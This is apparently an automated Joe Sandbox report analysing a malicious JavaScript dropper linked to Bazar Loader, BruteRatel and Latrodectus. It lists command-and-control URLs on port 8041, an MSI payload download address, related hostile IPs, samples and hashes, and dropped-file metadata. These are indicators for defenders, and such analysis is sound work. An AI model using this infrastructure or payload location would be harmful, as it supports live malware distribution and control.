                                                                                  http://188.119.112.7/das.msi0~DFED22D1FE613BF34C.TMP.1.dr, ~DF07B80D9F27CBE04D.TMP.1.dr, ~DF01B5DC13092BA872.TMP.1.dr, ~DF28B4DE99F83A16D6.TMP.1.dr, ~DF59A0B4535E503852.TMP.1.dr, inprogressinstallinfo.ipi.1.drtrue
                                                                                    unknown
                                                                                    https://bazarunet.com:8041/$Erundll32.exe, 00000006.00000003.3012131667.000001FF4CA78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://greshunka.com:8041/bazar.phpAm=rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000008.00000000.2456761349.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://greshunka.com:8041/admin.phpirundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://greshunka.com:8041/admin.phpUNrundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://bazarunet.com:8041/rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://greshunka.com/rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://bazarunet.com:8041/frundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://isomicrotich.com/test/iexplorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://greshunka.com:8041/Irundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://greshunka.com:8041/admin.phpprundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://isomicrotich.com/test/lexplorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://wns.windows.com/)sexplorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://tiguanin.com:8041/admin.phprundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://bazarunet.com:8041/bazar.php8rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://bazarunet.com:8041/bazar.phpllrundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://bazarunet.com/rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://isomicrotich.com/ECOMPARE.EXE.15Desktopexplorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://bazarunet.com:8041/Urundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://tiguanin.com:8041/0Erundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://isomicrotich.com/eEexplorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://tiguanin.com:8041/rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://tiguanin.com/rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://isomicrotich.com/yEzexplorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://tiguanin.com/)rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://greshunka.com:8041/net.com:8041/Pwrundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://r10.o.lencr.org0#rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, 
rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://outlook.comexplorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://greshunka.com:8041/bazar.phprundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://tiguanin.com:8041/$Erundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://bazarunet.com:8041/bazar.phprundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://isomicrotich.com/test/Gexplorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://greshunka.com:8041/bazar.phpGNrundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://bazarunet.com:8041/net.com:8041/admin.phpfrundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://www.thawte.com/cps0/MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://188.119.112.7/das.msi1737443152311351380~DF93ACB531B807E54B.TMP.1.drtrue
                                                                                                                                                        unknown
                                                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.2449894954.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://tiguanin.com:8041/Yrundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.thawte.com/repository0WMSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://greshunka.com:8041/bazar.phpq#(rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://tiguanin.com:8041/admin.php.rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://greshunka.com:8041/admin.phprundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.advancedinstaller.comMSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://api.msn.com/explorer.exe, 00000008.00000000.2452717662.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://isomicrotich.com/test/3explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.119.112.7 | unknown | Russian Federation | 50673 | SERVERIUS-ASNL | false
188.114.96.3 | isomicrotich.com | European Union | 13335 | CLOUDFLARENETUS | true
82.115.223.39 | greshunka.com | Russian Federation | 209821 | MIDNET-ASTK-TelecomRU | true
80.78.24.30 | tiguanin.com | Cyprus | 37560 | CYBERDYNELR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525184
Start date and time: 2024-10-03 20:41:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Document-18-33-08.js
Detection: MAL
Classification: mal100.spre.troj.evad.winJS@10/21@8/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 55
• Number of non-executed functions: 217
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Document-18-33-08.js
Time | Type | Description
14:42:02 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
14:42:03 | API Interceptor | 3262165x Sleep call for process: rundll32.exe modified
14:42:54 | API Interceptor | 1255883x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                          Contract_March_23_INV#305.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • aoureskindzet.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                          • 80.78.24.250
                                                                                                                                                                                                          67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 46.246.43.211
                                                                                                                                                                                                          attach#6081-18-03-2024.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 198.167.201.153
                                                                                                                                                                                                          bin.elfGet hashmaliciousPwnRig MinerBrowse
                                                                                                                                                                                                          • 80.78.24.30
                                                                                                                                                                                                          http://5d1d57a7.28cb0c8c5155aeac03abaf42.workers.dev/?qrc=cHN0b2VsdGluZ0Btb29nLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.24.136
                                                                                                                                                                                                          https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui-2FiJiLFhXN-2BaAoUhaFeS5thEexIiWqEF8dt08iW6JSqntxNZ_ZhPcx6WPs4ZPfYHsVw3kGc95DdiOlu2Hqu3wtZDfTdxDhqDrDyhN4LIHSWlo-2Bo5W6aEC693CmZYOUsRsAHZjNYMetybYb1uYwCQGuNUgutLCzNtMSdcaod8HflZ3qtLEYfvJ3h120nclv-2FPwWe4ZMuwG1g5FU0h57N477RbEMQV2-2FUVsni6xHvVTRhTmHDzgfD-2F3g-2BckOgde-2F51-2FeyDF08iaXxzVHgagCQPKWzGeSlI6hU-2B61MmZjONA8snu2jD66uyBw5PSnYyn0fMKgCqj-2FNBTJqL-2FTN8YlBx1uy4KooCKJiqFqcR8WxhpSnrzCOJaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.25.211
                                                                                                                                                                                                          https://d511cad4.9a81985336ae1461f17112ae.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.25.211
                                                                                                                                                                                                          CLOUDFLARENETUStMREqVW0.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                          • 104.20.3.235
                                                                                                                                                                                                          https://auth-owlting.com/enterprise/core.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.204.46
                                                                                                                                                                                                          https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                          • 172.67.204.105
                                                                                                                                                                                                          http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.26.6.103
                                                                                                                                                                                                          wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                          https://secured.viewonlineportalshared.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          RfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                          • 1.2.3.4
                                                                                                                                                                                                          https://dsfghfdaregfdgshfgdfh.blob.core.windows.net/dsfghfdaregfdgshfgdfh/l1.html#9/372-16527/1270-243896-29108Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                          • 104.21.32.108
                                                                                                                                                                                                          https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg-2BtYQAbYWaU-2BKDDWa611GxHig-2BgElXnUy1eAOeNoTI9ToS9WuAxRUdR21lAIsTPE0g-3D-3Dd8kL_bf4JG6rVotaFp8XsYJMcbHq5p6ju5xz6OkJFWJQMhev1YsQkFFV7zJr96yz5256BnjjwP-2FrVNKeomJDukUeXnM2-2FUbrpvrFpNFdN8Hxo-2B8NA1G5PPzQiWnVnq4RPrf4MxseS-2FjeJBGe3OOYXNXxDmns1gfYeFwrIC6tXtQ3KJv23PKABAyqpBB-2FnsXl7BropPMbry14s3UYpaAeg1aJih0NQeQpVSOm5MBDYOXEHCyJCtLrpoW6SuZeJlGeeWyYAhbotSAdFsjwH5JN5fjIYp-2BMzHm9VPykPI2oeKmW91mIcQqO5YJ1dVv925b7N0T1vGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.247.203
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Windows\Installer\MSIF101.tmp | Document-19-51-48.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | dsa.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | Document-19-27-03.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | DLPAgent.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | Document-21-41-00.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | CITROEN.msi | malicious | Bazar Loader, BruteRatel
C:\Windows\Installer\MSIF101.tmp | DLPAgent.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF101.tmp | 6ylVfr0IVw.msi | malicious | Latrodectus
C:\Windows\Installer\MSIF101.tmp | Document-19-25-24.js | malicious | Latrodectus
C:\Windows\Installer\MSIF101.tmp | vfs.msi | malicious | Latrodectus
C:\Windows\Installer\MSIF160.tmp | Document-19-51-48.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | dsa.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | Document-19-27-03.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | DLPAgent.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | Document-21-41-00.js | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | CITROEN.msi | malicious | Bazar Loader, BruteRatel
C:\Windows\Installer\MSIF160.tmp | DLPAgent.msi | malicious | Bazar Loader, BruteRatel, Latrodectus
C:\Windows\Installer\MSIF160.tmp | 6ylVfr0IVw.msi | malicious | Latrodectus
C:\Windows\Installer\MSIF160.tmp | Document-19-25-24.js | malicious | Latrodectus
C:\Windows\Installer\MSIF160.tmp | vfs.msi | malicious | Latrodectus
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1208
                                                                                                                                                                                                                                                  Entropy (8bit):5.666842674497995
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:hOgJsrvgTU68NWdhW/nHN9RpU6Wg2FP+WDhiSQ8lVWfLK:UusrIn8NWdhWPHN9b76P3D8S/H
                                                                                                                                                                                                                                                  MD5:C9AB2AEB282DFE0099AE981249C33A4F
                                                                                                                                                                                                                                                  SHA1:A5C65512BD2E34ACBA1829A10B6C5F049668E345
                                                                                                                                                                                                                                                  SHA-256:5664B2DDF9539278B3437074D0383E16B10EB525549DAD7C83A38CD8EDCAC921
                                                                                                                                                                                                                                                  SHA-512:33FEDD667AFDF245AA0370D98EDF9BE655492EB26AC85CAB611C3078C3A8BDC5B49B31267ED1C9694BCC824C4AEDEA089F245068A1FDF5E189F37209F089B84E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@QuCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@........CreateFolders..Creating folders..Folder: [1]#.:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6].. .C:\Users\user\AppData\Roaming\....2.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll....WriteRegistryValues..Writing system registry values..
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):767488
                                                                                                                                                                                                                                                  Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                                                  Encrypted:false
